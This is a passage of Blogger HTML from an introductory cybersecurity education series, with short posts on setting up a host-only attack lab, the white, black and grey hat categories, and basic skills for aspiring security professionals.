<span style="font-family: "trebuchet ms" , sans-serif;">Feel free to poke around your brand new attack machine after
the update is completed and you have<span style="background-color: yellow;"> SWITCHED the network adapter to custom
VMNet1 (Host Only)</span>.</span></div>
</div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">In our next article we will start using the attack
machine to talk to our victim machines. <o:p></o:p></span></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><i>-Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span></div>
</div>
Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-74140813402139201432016-09-23T03:25:00.001-07:002016-10-12T02:40:18.743-07:00People in Cyber Security and You<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;">Cyber security is one of the fastest growing industries
out there. Thanks to the bad guys ;)</span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">But first! I have to give you a disclaimer before we
go on:-</span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><i>Anything demonstrated on this article series is purely
for educational purposes ONLY. Do not test on live computers over the internet
unless you have an official authorization to do so. We are relying solely on
your good ethics to utilize skills learnt from this series to help make the
cyber space a more secure place. </i><o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;">Now that we have a thumbs up from our legal team,
let’s move on.</span></div>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<h3>
<span style="font-family: Trebuchet MS, sans-serif;">
The 3 Hats</span></h3>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;">You will come across '3 hats' in
cyber security: the white, the black, and the grey. Think of them as the 60’s
movie title “The Good, the Bad and the Ugly”. <o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif; text-indent: -0.25in;"><br /></span></div>
<div class="MsoNoSpacing">
</div>
<ul>
<li><span style="font-family: Trebuchet MS, sans-serif;">White Hats – These are the good people. They
make your anti-virus, they help secure networks in companies, test software to
look for bugs that can be exploited, and so on. All the good things. </span></li>
</ul>
<div class="MsoNoSpacing">
</div>
<ul>
<li><span style="font-family: Trebuchet MS, sans-serif;">Black Hats – These are the not-so-good
people. They target whoever they like, then spend countless hours looking for
security weaknesses and exploiting them to hack into networks for malicious intent and profit.</span></li>
</ul>
<div class="MsoListParagraph">
</div>
<ul>
<li><span style="font-family: Trebuchet MS, sans-serif;">Grey Hats – Think of them as the hybrids. They
have good ethics like the white hats and sometimes break the rules, but without
the dangerous intent of black hats. These are basically the cool guys who know how to bend rules without breaking the law. </span></li>
</ul>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;">All three types of people are continuously honing their
skills to outsmart one another. The black hats tirelessly look for weaknesses in
software and networks to hack into, while the white hats constantly develop
patches, policies and best practices to prevent black hats from exploiting those
weaknesses.<o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;">In the cyber security industry there are new
threats every day, and new techniques for preventing and stopping them.
The key is to constantly practice, practice, practice and read, read, read. <o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<h3>
<span style="font-family: Trebuchet MS, sans-serif;">
So what do you need to be a security expert?</span></h3>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;">Let’s get one thing straight. There is no 100% expert in all aspects of cyber
security. Nada. Naught. None. You simply cannot be an “expert” in a field that is ever-growing and evolving immensely. But what you can be is one of the best out there. Below are the fundamental skills that every pro hacker needs:</span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif; text-indent: -0.25in;"><br /></span></div>
<div class="MsoNoSpacing">
</div>
<ol>
<li><span style="font-family: Trebuchet MS, sans-serif;">A very good understanding of different types of
operating systems.</span></li>
<li><span style="font-family: Trebuchet MS, sans-serif;">A good understanding of networking and its
concepts.</span></li>
<li><span style="font-family: Trebuchet MS, sans-serif;">Have good programming skills.</span></li>
<li><span style="font-family: Trebuchet MS, sans-serif;">And the most crucial of them all, have a mind
curious enough to want to break things and see what’s going on behind the
curtains.</span></li>
</ol>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;">If you feel you are weak in any or all of the first
three, fear not, for you shall only need the curiosity to get better at them. <o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;">It’s about time we go hands-on. Stay tuned for our next
article, where we will help you create your own hack lab in which you can safely put the theories to the test. <o:p></o:p></span></div>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<i style="background-color: white; color: #333333;"><span style="font-family: Trebuchet MS, sans-serif;">-Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</span></i></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<i style="background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px;"><br /></i></div>
Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-70813136142511429202016-09-23T02:49:00.002-07:002016-09-23T13:02:51.487-07:00Bitcrack’s Educational Series Blog!<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h2>
<span style="font-family: "trebuchet ms" , sans-serif;">Greetings!</span></h2>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">Do you want to get started into cyber security? <o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">Are you passionate about cyber security and want to try
things out?<o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">Are you tired of seeing cyber security articles with
no practical guidance?<o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">Would you like to know and try out new security tools?<o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">Then you have just stumbled upon the right resource. </span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;"><b>Welcome to Bitcrack’s Educational Series Blog!</b></span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Here at Bitcrack Cyber Security, we believe basic knowledge should be
freely accessible to all. In this series we will help you with the very basics
of cyber security, with hands-on guides from the very beginning of creating your
own virtual hack lab to using popular penetration testing methodologies, all the
way to reverse engineering and exploit development. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">NOTE – This
educational series is not meant for experts. For technical articles please go to: <a href="http://blog.bitcrack.net/" target="_blank">blog.bitcrack.net</a><o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">So let’s get right to it.</span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<o:p><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></o:p></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">Oh, and if you want more info such as a specific guide, can’t get a tool working or anything to do with IT and cyber security,<o:p></o:p></span></div>
<div class="MsoNoSpacing" style="text-indent: .5in;">
<span style="font-family: "trebuchet ms" , sans-serif;">send us a tweet at:<o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"> <a href="https://twitter.com/bitcrack_cyber" target="_blank">@bitcrack_cyber</a>
| <a href="https://twitter.com/secjay" target="_blank">@secjay</a> | <a href="https://twitter.com/RuraPenthe0" target="_blank">@RuraPenthe0</a><o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">...because emails are too boring and who has time for forms! :-)<o:p></o:p></span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;"><b>PS - We also do corporate-based security training should you or your company want to get really in-depth into hacking in a class setting.</b></span></div>
</div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<span style="font-size: 11pt; line-height: 107%;"><span style="font-family: "trebuchet ms" , sans-serif;">Finally, follow our <a href="https://www.linkedin.com/company/bitcrack-cyber-security" target="_blank">LinkedIn page</a> for the latest security trends and news. </span></span>Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0